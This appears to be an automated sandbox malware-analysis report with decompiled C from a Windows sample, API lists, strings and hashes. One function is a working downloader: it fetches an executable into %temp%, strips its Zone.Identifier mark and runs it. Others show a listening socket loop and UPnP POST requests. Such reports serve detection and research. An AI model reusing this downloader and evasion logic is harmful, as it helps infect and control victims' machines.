                                                                                  0x00409762
                                                                                  0x0040976b
                                                                                  0x00409774
                                                                                  0x0040977d
                                                                                  0x00409786
                                                                                  0x0040978f
                                                                                  0x00409798
                                                                                  0x004097a1
                                                                                  0x004097a9
                                                                                  0x004097b2
                                                                                  0x004097b8
                                                                                  0x004097bb
                                                                                  0x004097c1

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6696025097f37fa636f8ea5ba2805a2caa9eb9538a37ce69a63a5005cce2f2de
                                                                                  • Instruction ID: 31e85414ae03b6fb680a6f7af3e30cc74686a058db12ae9e6508e8aaf28ea823
                                                                                  • Opcode Fuzzy Hash: 6696025097f37fa636f8ea5ba2805a2caa9eb9538a37ce69a63a5005cce2f2de
                                                                                  • Instruction Fuzzy Hash: CA128CB4D00219DFCB48CF99D991AAEFBB2BF88300F24856AE415BB345D734AA01CF54
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 71%
                                                                                  			E0040F088(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                                                                  				intOrPtr _v8;
                                                                                  				char _v12;
                                                                                  				void* __ebp;
                                                                                  				signed int* _t43;
                                                                                  				char _t44;
                                                                                  				void* _t46;
                                                                                  				void* _t49;
                                                                                  				intOrPtr* _t53;
                                                                                  				void* _t54;
                                                                                  				void* _t65;
                                                                                  				long _t66;
                                                                                  				signed int* _t80;
                                                                                  				signed int* _t82;
                                                                                  				void* _t84;
                                                                                  				signed int _t86;
                                                                                  				void* _t89;
                                                                                  				void* _t95;
                                                                                  				void* _t96;
                                                                                  				void* _t99;
                                                                                  				void* _t106;
                                                                                  
                                                                                  				_t43 = _t84;
                                                                                  				_t65 = __ebx + 2;
                                                                                  				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                                                                  				_t89 = _t95;
                                                                                  				_t96 = _t95 - 8;
                                                                                  				_push(_t65);
                                                                                  				_push(_t84);
                                                                                  				_push(_t89);
                                                                                  				asm("cld");
                                                                                  				_t66 = _a8;
                                                                                  				_t44 = _a4;
                                                                                  				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                                                                  					_push(_t89);
                                                                                  					E0040F213(_t66 + 0x10, _t66, 0xffffffff);
                                                                                  					_t46 = 1;
                                                                                  				} else {
                                                                                  					_v12 = _t44;
                                                                                  					_v8 = _a12;
                                                                                  					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                                                                  					_t86 =  *(_t66 + 0xc);
                                                                                  					_t80 =  *(_t66 + 8);
                                                                                  					_t49 = E0040F2CD(_t66);
                                                                                  					_t99 = _t96 + 4;
                                                                                  					if(_t49 == 0) {
                                                                                  						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                                                  						goto L11;
                                                                                  					} else {
                                                                                  						while(_t86 != 0xffffffff) {
                                                                                  							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                                                                  							if(_t53 == 0) {
                                                                                  								L8:
                                                                                  								_t80 =  *(_t66 + 8);
                                                                                  								_t86 = _t80[_t86 + _t86 * 2];
                                                                                  								continue;
                                                                                  							} else {
                                                                                  								_t54 =  *_t53();
                                                                                  								_t89 = _t89;
                                                                                  								_t86 = _t86;
                                                                                  								_t66 = _a8;
                                                                                  								_t55 = _t54;
                                                                                  								_t106 = _t54;
                                                                                  								if(_t106 == 0) {
                                                                                  									goto L8;
                                                                                  								} else {
                                                                                  									if(_t106 < 0) {
                                                                                  										_t46 = 0;
                                                                                  									} else {
                                                                                  										_t82 =  *(_t66 + 8);
                                                                                  										E0040F1B8(_t55, _t66);
                                                                                  										_t89 = _t66 + 0x10;
                                                                                  										E0040F213(_t89, _t66, 0);
                                                                                  										_t99 = _t99 + 0xc;
                                                                                  										E0040F2AF(_t82[2]);
                                                                                  										 *(_t66 + 0xc) =  *_t82;
                                                                                  										_t66 = 0;
                                                                                  										_t86 = 0;
                                                                                  										 *(_t82[2])(1);
                                                                                  										goto L8;
                                                                                  									}
                                                                                  								}
                                                                                  							}
                                                                                  							goto L13;
                                                                                  						}
                                                                                  						L11:
                                                                                  						_t46 = 1;
                                                                                  					}
                                                                                  				}
                                                                                  				L13:
                                                                                  				return _t46;
                                                                                  			}

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 403510b0cf44a19509243faff8fda87969da86ef6f1582569b9df3b225e8f989
                                                                                  • Instruction ID: c89b1f1aed9b0248fc9c0d1501c666ce6946f3611ed6ad9513cfba108821c7e4
                                                                                  • Opcode Fuzzy Hash: 403510b0cf44a19509243faff8fda87969da86ef6f1582569b9df3b225e8f989
                                                                                  • Instruction Fuzzy Hash: F421B676900204DBCB20EF69C880967B7A5FF44350B4581BAED59AB285D734FD19C7E4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 82%
                                                                                  			E0040D890(char* _a4, signed int _a8) {
                                                                                  				short _v524;
                                                                                  				short _v1044;
                                                                                  				signed char _v1045;
                                                                                  				short _v1572;
                                                                                  				void* _v1576;
                                                                                  				void* _v1580;
                                                                                  				short _v2100;
                                                                                  				void _v2364;
                                                                                  				long _v2368;
                                                                                  				long _v2372;
                                                                                  				void* _v2376;
                                                                                  				intOrPtr* _v2380;
                                                                                  				intOrPtr _v2384;
                                                                                  				char _v2385;
                                                                                  				intOrPtr _v2392;
                                                                                  				signed int _t88;
                                                                                  				signed int _t90;
                                                                                  				int _t96;
                                                                                  				signed int _t97;
                                                                                  				signed int _t99;
                                                                                  				signed int _t101;
                                                                                  				signed int _t111;
                                                                                  				signed char _t125;
                                                                                  				signed char _t127;
                                                                                  				void* _t181;
                                                                                  				void* _t182;
                                                                                  				void* _t184;
                                                                                  
                                                                                  				srand(GetTickCount());
                                                                                  				_t182 = _t181 + 4;
                                                                                  				_v1045 = 0;
                                                                                  				ExpandEnvironmentStringsW(L"%temp%",  &_v2100, 0x104);
                                                                                  				_v2380 = _a4;
                                                                                  				_v2384 = _v2380 + 1;
                                                                                  				do {
                                                                                  					_v2385 =  *_v2380;
                                                                                  					_v2380 = _v2380 + 1;
                                                                                  				} while (_v2385 != 0);
                                                                                  				_v2392 = _v2380 - _v2384;
                                                                                  				mbstowcs( &_v1044, _a4, _v2392 + 1);
                                                                                  				_t88 = rand();
                                                                                  				asm("cdq");
                                                                                  				_t90 = rand();
                                                                                  				asm("cdq");
                                                                                  				wsprintfW( &_v1572, L"%s\\%d%d.exe",  &_v2100, _t90 % 0x7fff + 0x3e8, _t88 % 0x7fff + 0x3e8);
                                                                                  				_t184 = _t182 + 0x20;
                                                                                  				_v2376 = InternetOpenW(L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36", 0, 0, 0, 0);
                                                                                  				if(_v2376 != 0) {
                                                                                  					_v1576 = InternetOpenUrlW(_v2376,  &_v1044, 0, 0, 0, 0);
                                                                                  					if(_v1576 != 0) {
                                                                                  						_v1580 = CreateFileW( &_v1572, 0x40000000, 0, 0, 2, 0, 0);
                                                                                  						if(_v1580 != 0xffffffff) {
                                                                                  							while(InternetReadFile(_v1576,  &_v2364, 0x103,  &_v2372) != 0 && _v2372 != 0) {
                                                                                  								WriteFile(_v1580,  &_v2364, _v2372,  &_v2368, 0);
                                                                                  							}
                                                                                  							CloseHandle(_v1580);
                                                                                  							wsprintfW( &_v524, L"%s:Zone.Identifier",  &_v1572);
                                                                                  							DeleteFileW( &_v524);
                                                                                  							Sleep(0x3e8);
                                                                                  							_t125 = E0040D580( &_v1572);
                                                                                  							_t184 = _t184 + 0x10;
                                                                                  							if((_t125 & 0x000000ff) == 0) {
                                                                                  								DeleteFileW( &_v1572);
                                                                                  							} else {
                                                                                  								Sleep(0x7d0);
                                                                                  								_t127 = E0040D740( &_v1572);
                                                                                  								_t184 = _t184 + 4;
                                                                                  								if((_t127 & 0x000000ff) == 1) {
                                                                                  									if((_a8 & 0x000000ff) == 1) {
                                                                                  										ExitProcess(0);
                                                                                  									}
                                                                                  									_v1045 = 1;
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  						CloseHandle(_v1580);
                                                                                  					}
                                                                                  					InternetCloseHandle(_v1576);
                                                                                  				}
                                                                                  				InternetCloseHandle(_v2376);
                                                                                  				Sleep(0x3e8);
                                                                                  				_t96 = _v1045 & 0x000000ff;
                                                                                  				if(_t96 == 0) {
                                                                                  					_t97 = rand();
                                                                                  					asm("cdq");
                                                                                  					Sleep(0x1388 + _t97 % 0xea60 * 5);
                                                                                  					_t99 = rand();
                                                                                  					asm("cdq");
                                                                                  					_t101 = rand();
                                                                                  					asm("cdq");
                                                                                  					_t96 = wsprintfW( &_v1572, L"%s\\%d%d.exe",  &_v2100, _t101 % 0x7fff + 0x3e8, _t99 % 0x7fff + 0x3e8);
                                                                                  					_push(0);
                                                                                  					_push(0);
                                                                                  					_push( &_v1572);
                                                                                  					_push( &_v1044);
                                                                                  					_push(0);
                                                                                  					L0040F052();
                                                                                  					if(_t96 == 0) {
                                                                                  						wsprintfW( &_v524, L"%s:Zone.Identifier",  &_v1572);
                                                                                  						DeleteFileW( &_v524);
                                                                                  						Sleep(0x3e8);
                                                                                  						if((E0040D580( &_v1572) & 0x000000ff) == 0) {
                                                                                  							return DeleteFileW( &_v1572);
                                                                                  						}
                                                                                  						Sleep(0x7d0);
                                                                                  						_t111 = E0040D740( &_v1572) & 0x000000ff;
                                                                                  						if(_t111 == 0 || (_a8 & 0x000000ff) != 1) {
                                                                                  							return _t111;
                                                                                  						} else {
                                                                                  							ExitProcess(0);
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				return _t96;
                                                                                  			}
                                                                                  0x0040db9a
                                                                                  0x0040db9c
                                                                                  0x0040dba3
                                                                                  0x0040dbbc
                                                                                  0x0040dbcc
                                                                                  0x0040dbd7
                                                                                  0x0040dbf1
                                                                                  0x00000000
                                                                                  0x0040dc2e
                                                                                  0x0040dbf8
                                                                                  0x0040dc0d
                                                                                  0x0040dc12
                                                                                  0x00000000
                                                                                  0x0040dc1d
                                                                                  0x0040dc1f
                                                                                  0x0040dc1f
                                                                                  0x0040dc12
                                                                                  0x0040dba3
                                                                                  0x0040dc37

APIs
• GetTickCount.KERNEL32 ref: 0040D899
• srand.MSVCRT ref: 0040D8A0
• ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040D8C0
• mbstowcs.NTDLL ref: 0040D923
• rand.MSVCRT ref: 0040D92B
• rand.MSVCRT ref: 0040D93F
• wsprintfW.USER32 ref: 0040D966
• InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040D97C
• InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040D9AB
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040D9DA
• InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040DA0D
• WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040DA3E
• CloseHandle.KERNEL32(000000FF), ref: 0040DA4D
• wsprintfW.USER32 ref: 0040DA66
• DeleteFileW.KERNEL32(?), ref: 0040DA76
• ExitProcess.KERNEL32 ref: 0040DACA
• Sleep.KERNEL32(000007D0), ref: 0040DAA2
  • Part of subcall function 0040D740: memset.NTDLL ref: 0040D74E
  • Part of subcall function 0040D740: CreateProcessW.KERNELBASE ref: 0040D795
  • Part of subcall function 0040D740: Sleep.KERNELBASE(000003E8), ref: 0040D7A5
• DeleteFileW.KERNEL32(?), ref: 0040DAE0
• CloseHandle.KERNEL32(000000FF), ref: 0040DAED
• InternetCloseHandle.WININET(00000000), ref: 0040DAFA
• InternetCloseHandle.WININET(00000000), ref: 0040DB07
• Sleep.KERNEL32(000003E8), ref: 0040DB12
• rand.MSVCRT ref: 0040DB27
• Sleep.KERNEL32 ref: 0040DB3E
• rand.MSVCRT ref: 0040DB44
• rand.MSVCRT ref: 0040DB58
• wsprintfW.USER32 ref: 0040DB7F
• URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040DB9C
• wsprintfW.USER32 ref: 0040DBBC
• DeleteFileW.KERNEL32(?), ref: 0040DBCC
• Sleep.KERNEL32(000003E8), ref: 0040DBD7
• Sleep.KERNEL32(000003E8), ref: 0040DA81
  • Part of subcall function 0040D580: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040D5B4
  • Part of subcall function 0040D580: CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040D5D5
  • Part of subcall function 0040D580: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040D5F4
  • Part of subcall function 0040D580: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040D60D
• Sleep.KERNEL32(000007D0), ref: 0040DBF8
• ExitProcess.KERNEL32 ref: 0040DC1F
• DeleteFileW.KERNEL32(?), ref: 0040DC2E
Strings
• %s\%d%d.exe, xrefs: 0040D95A
• Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36, xrefs: 0040D977
• %s:Zone.Identifier, xrefs: 0040DBB0
• %s\%d%d.exe, xrefs: 0040DB73
• %temp%, xrefs: 0040D8BB
• %s:Zone.Identifier, xrefs: 0040DA5A
Memory Dump Source
• Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
Yara matches
Similarity
• API ID: File$Sleep$Internetrand$CloseCreateDeleteHandlewsprintf$Process$ExitOpen$CountDownloadEnvironmentExpandMappingReadSizeStringsTickViewWritembstowcsmemsetsrand
• String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
• API String ID: 3135114409-2996245764
• Opcode ID: a416aaf8c19d7d0f3ee08b18e8123934b23fefb66b47613bd15720cd54ae3611
• Instruction ID: 9292b30b737f4007fadc37ef56157f39d8097e5f89b4cfd55e16e9e87d2adf29
• Opcode Fuzzy Hash: a416aaf8c19d7d0f3ee08b18e8123934b23fefb66b47613bd15720cd54ae3611
• Instruction Fuzzy Hash: CF91C7B1D41318ABEB20DB50DC45FEA7775BB88705F0484F9F609A61C1DAB89AC4CF58
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
Basic blocks (id: address range, API calls and subcalls; successor blocks):
• 381: 40e7a0-40e7c7 (GetTickCount, WaitForSingleObject) -> 382, 383
• 382: 40e949-40e94f -> (none, function exit)
• 383: 40e7cd-40e7e4 (WSAWaitForMultipleEvents) -> 384, 385
• 384: 40e870-40e883 (GetTickCount) -> 386, 387
• 385: 40e7ea-40e801 (WSAEnumNetworkEvents) -> 384, 388
• 386: 40e8c3-40e8cc (GetTickCount) -> 389, 390
• 387: 40e885-40e894 (EnterCriticalSection) -> 391, 392
• 388: 40e803-40e808 -> 384, 393
• 389: 40e935-40e943 (WaitForSingleObject) -> 382, 383
• 390: 40e8ce-40e8dd (EnterCriticalSection) -> 394, 395
• 391: 40e896-40e89d -> 396, 397
• 392: 40e8ba-40e8c1 (LeaveCriticalSection) -> 389
• 393: 40e80a-40e810 -> 384, 398
• 394: 40e921-40e931 (LeaveCriticalSection, GetTickCount) -> 389
• 395: 40e8df-40e8f7 (InterlockedExchangeAdd, call 40c210) -> 406, 407
• 396: 40e8b5 (call 40e6a0) -> 392
• 397: 40e89f-40e8a7 -> 391, 401
• 398: 40e812-40e831 (accept) -> 384, 399
• 399: 40e833-40e842 (call 40e330) -> 384, 408
• 401: 40e8a9-40e8b0 (LeaveCriticalSection) -> 389
• 406: 40e917-40e91f -> 394, 395
• 407: 40e8f9-40e902 -> 406, 409
• 408: 40e844-40e85f (call 40e5c0) -> 384, 414
• 409: 40e904-40e90d (call 409940) -> 406
• 414: 40e861-40e867 -> 384, 415
• 415: 40e869-40e86b (call 40eb70) -> 384
C-Code - Quality: 82%
E0040E7A0(intOrPtr* _a4) {
	intOrPtr _v64;
	char _v68;
	long _v72;
	signed char _v80;
	long _v92;
	char _v96;
	char _v100;
	void* __ebx;
	void* __edi;
	void* __ebp;
	intOrPtr _t15;
	long _t31;
	long _t33;
	long _t34;
	long _t42;
	intOrPtr _t45;
	intOrPtr _t49;
	intOrPtr* _t56;
	intOrPtr _t70;
	intOrPtr* _t73;
	long _t74;
	intOrPtr _t75;
	struct _CRITICAL_SECTION* _t76;
	intOrPtr* _t77;
	void* _t78;
	signed int _t79;
	void* _t81;

	_t81 = (_t79 & 0xfffffff8) - 0x44;
	_t31 = GetTickCount();
	_t56 = _a4;
	_v72 = _t31;
	// The handle at +0x10 acts as the stop signal: a signalled state (return 0) ends the loop.
	_t33 = WaitForSingleObject( *(_t56 + 0x10), 1);
	if(_t33 == 0) {
		L25:
		return _t33;
	} else {
		goto L1;
	}
	do {
		L1:
		// Zero-timeout poll of the WSA event object stored at +0x18 (bound to the listening socket at +0x14).
		_t73 = _t56 + 0x18;
		__imp__WSAWaitForMultipleEvents(1, _t73, 0, 0, 0);
		if(_t33 != 0x102) { // 0x102 = WSA_WAIT_TIMEOUT, nothing pending
			__imp__WSAEnumNetworkEvents( *((intOrPtr*)(_t56 + 0x14)),  *_t73,  &_v68);
			// FD_ACCEPT (0x8) signalled with no error code, and the owner structure carries the expected tag.
			if((_v80 & 0x00000008) != 0 && _v64 == 0 &&  *_t56 == 0x494f4350) {
				_t49 =  *((intOrPtr*)(_t56 + 0x14));
				_v100 = 0x10; // sizeof(sockaddr_in)
				__imp__#1(_t49,  &_v96,  &_v100); // ws2_32 ordinal 1 = accept()
				if(_t49 != 0xffffffff) { // INVALID_SOCKET
					// E0040E330 returns a per-connection record for the accepted socket (socket at +0x260, next at +0x280).
					_t77 = E0040E330(_t56, _t49);
					_t81 = _t81 + 4;
					if(_t77 != 0) {
						_t15 = _t77 + 0x264; // 0x264
						E0040E5C0(0, _t77, _t56, _t15);
						_t81 = _t81 + 8;
						if( *((char*)(_t77 + 0x274)) == 0 &&  *_t77 == 0x69636c69) {
							E0040EB70(_t77);
						}
					}
				}
			}
		}
		_t34 = GetTickCount();
		_t74 = _v92;
		if(_t34 - _t74 < 0x3e8) {
			if(GetTickCount() - _t74 < 0x2710) {
				goto L24;
			}
			// Idle-connection sweep: walk the record list (head at +0x38, next at +0x280) under the critical section at +0x20.
			EnterCriticalSection(_t56 + 0x20);
			_t75 =  *((intOrPtr*)(_t56 + 0x38));
			if(_t75 == 0) {
				L23:
				LeaveCriticalSection(_t56 + 0x20);
				_v92 = GetTickCount();
				goto L24;
			} else {
				goto L19;
			}
			do {
				L19:
				// +4 holds the record's last-activity stamp; E0040C210 supplies the current clock value.
				_t42 = InterlockedExchangeAdd(_t75 + 4, 0);
				if(E0040C210() - _t42 >= 0x1e) { // idle for 30 or more clock units
					_t45 =  *((intOrPtr*)(_t75 + 0x260));
					if( *((intOrPtr*)(_t75 + 0x260)) != 0xffffffff) {
						E00409940(_t45); // close the idle socket and mark it as closed (-1)
						_t81 = _t81 + 4;
						 *((intOrPtr*)(_t75 + 0x260)) = 0xffffffff;
					}
				}
				_t75 =  *((intOrPtr*)(_t75 + 0x280));
			} while (_t75 != 0);
			goto L23;
		}
		// Look for a record whose socket was already closed (-1) and hand it to E0040E6A0.
		_t76 = _t56 + 0x20;
		EnterCriticalSection(_t76);
		_t70 =  *((intOrPtr*)(_t56 + 0x38));
		if(_t70 == 0) {
			L16:
			LeaveCriticalSection(_t76);
			goto L24;
		}
		while( *((intOrPtr*)(_t70 + 0x260)) != 0xffffffff) {
			_t70 =  *((intOrPtr*)(_t70 + 0x280));
			if(_t70 != 0) {
				continue;
			} else {
				LeaveCriticalSection(_t76);
				goto L24;
			}
		}
		E0040E6A0(_t56, _t70, _t78);
		goto L16;
		L24:
		// Re-check the stop signal (1 ms wait) before the next iteration.
		_t33 = WaitForSingleObject( *(_t56 + 0x10), 1);
	} while (_t33 != 0);
	goto L25;
}
Instruction address column (0x0040e7a6 to 0x0040e94f)
                                                                                  0x0040e889
                                                                                  0x0040e88f
                                                                                  0x0040e894
                                                                                  0x0040e8ba
                                                                                  0x0040e8bb
                                                                                  0x00000000
                                                                                  0x0040e8bb
                                                                                  0x0040e896
                                                                                  0x0040e89f
                                                                                  0x0040e8a7
                                                                                  0x00000000
                                                                                  0x0040e8a9
                                                                                  0x0040e8aa
                                                                                  0x00000000
                                                                                  0x0040e8aa
                                                                                  0x0040e8a7
                                                                                  0x0040e8b5
                                                                                  0x00000000
                                                                                  0x0040e935
                                                                                  0x0040e93b
                                                                                  0x0040e941
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 0040E7AC
                                                                                  • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040E7BF
                                                                                  • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 0040E7D9
                                                                                  • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 0040E7F6
                                                                                  • accept.WS2_32(?,?,?), ref: 0040E828
                                                                                  • GetTickCount.KERNEL32 ref: 0040E876
                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0040E889
                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0040E8AA
                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0040E8BB
                                                                                  • GetTickCount.KERNEL32 ref: 0040E8C3
                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0040E8D2
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040E8E5
                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0040E925
                                                                                  • GetTickCount.KERNEL32 ref: 0040E92B
                                                                                  • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040E93B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                                                                  • String ID: PCOI$ilci
                                                                                  • API String ID: 3345448188-3762367603
                                                                                  • Opcode ID: 21530c16b04613800cb5c1967301639b7ffc4cd3d4e3b063b4a76a46442c98f0
                                                                                  • Instruction ID: a4307afca7aad85b9c9d9f5dd23984def65cc417f4fb2f5aaa278dd0cd3fd46e
                                                                                  • Opcode Fuzzy Hash: 21530c16b04613800cb5c1967301639b7ffc4cd3d4e3b063b4a76a46442c98f0
                                                                                  • Instruction Fuzzy Hash: AE4117725002009BCB10AF36DC88B9B77A4AB44720F048E39F899A72D1D778EC95CB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 79%
                                                                                  			E0040D110(char* _a4, char* _a8, void* _a12, long* _a16) {
                                                                                  				char _v260;
                                                                                  				char _v772;
                                                                                  				char* _v776;
                                                                                  				void* _v780;
                                                                                  				intOrPtr _v792;
                                                                                  				char* _v796;
                                                                                  				signed short _v816;
                                                                                  				intOrPtr _v820;
                                                                                  				char* _v824;
                                                                                  				void _v836;
                                                                                  				void* _v840;
                                                                                  				void* _v844;
                                                                                  				void* _v848;
                                                                                  				char _v852;
                                                                                  				long _v856;
                                                                                  				void _v1884;
                                                                                  				long _v1888;
                                                                                  				void* _t102;
                                                                                  				void* _t103;
                                                                                  
                                                                                  				_v776 = 0;
                                                                                  				_v840 = 0;
                                                                                  				memset( &_v836, 0, 0x38);
                                                                                  				_t103 = _t102 + 0xc;
                                                                                  				_v840 = 0x3c;
                                                                                  				_v824 =  &_v260;
                                                                                  				_v820 = 0x100;
                                                                                  				_v796 =  &_v772;
                                                                                  				_v792 = 0x200;
                                                                                  				InternetCrackUrlA(_a4, 0, 0x10000000,  &_v840);
                                                                                  				_v780 = InternetOpenA("Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)", 1, 0, 0, 0);
                                                                                  				if(_v780 != 0) {
                                                                                  					_v844 = InternetConnectA(_v780,  &_v260, _v816 & 0x0000ffff, 0, 0, 3, 0, 0);
                                                                                  					if(_v844 != 0) {
                                                                                  						_v848 = HttpOpenRequestA(_v844, "POST",  &_v772, 0, 0, 0, 0, 0);
                                                                                  						if(_v848 != 0) {
                                                                                  							HttpAddRequestHeadersA(_v848, _a8, 0xffffffff, 0xa0000000);
                                                                                  							_v852 = "Content-Type: text/xml; charset=\"utf-8\"\r\nConnection: Close\r\nCache-Control: no-cache\r\nPragma: no-cache\r\n";
                                                                                  							_t29 =  &_v852; // 0x410928
                                                                                  							if(HttpSendRequestA(_v848,  *_t29, 0xffffffff, _a12,  *_a16) != 0) {
                                                                                  								_v856 = 0;
                                                                                  								while(1 != 0) {
                                                                                  									_t98 = _v848;
                                                                                  									if(InternetReadFile(_v848,  &_v1884, 0x400,  &_v1888) != 0 && _v1888 != 0) {
                                                                                  										_v776 = E00408EA0(_v776, _t98, _v776, _v856 + _v1888);
                                                                                  										memcpy( &(_v776[_v856]),  &_v1884, _v1888);
                                                                                  										_t103 = _t103 + 0x14;
                                                                                  										_v856 = _v856 + _v1888;
                                                                                  										continue;
                                                                                  									}
                                                                                  									break;
                                                                                  								}
                                                                                  								 *_a16 = _v856;
                                                                                  							}
                                                                                  							InternetCloseHandle(_v848);
                                                                                  						}
                                                                                  						InternetCloseHandle(_v844);
                                                                                  					}
                                                                                  					InternetCloseHandle(_v780);
                                                                                  				}
                                                                                  				return _v776;
                                                                                  			}

                                                                                  APIs
                                                                                  • memset.NTDLL ref: 0040D138
                                                                                  • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040D188
                                                                                  • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040D19B
                                                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040D1D4
                                                                                  • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040D20A
                                                                                  • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040D235
                                                                                  • HttpSendRequestA.WININET(00000000,(A,000000FF,00009E34), ref: 0040D25F
                                                                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040D29E
                                                                                  • memcpy.NTDLL(00000000,?,00000000), ref: 0040D2F0
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040D321
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040D32E
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040D33B
                                                                                  Strings
                                                                                  Memory Dump Source
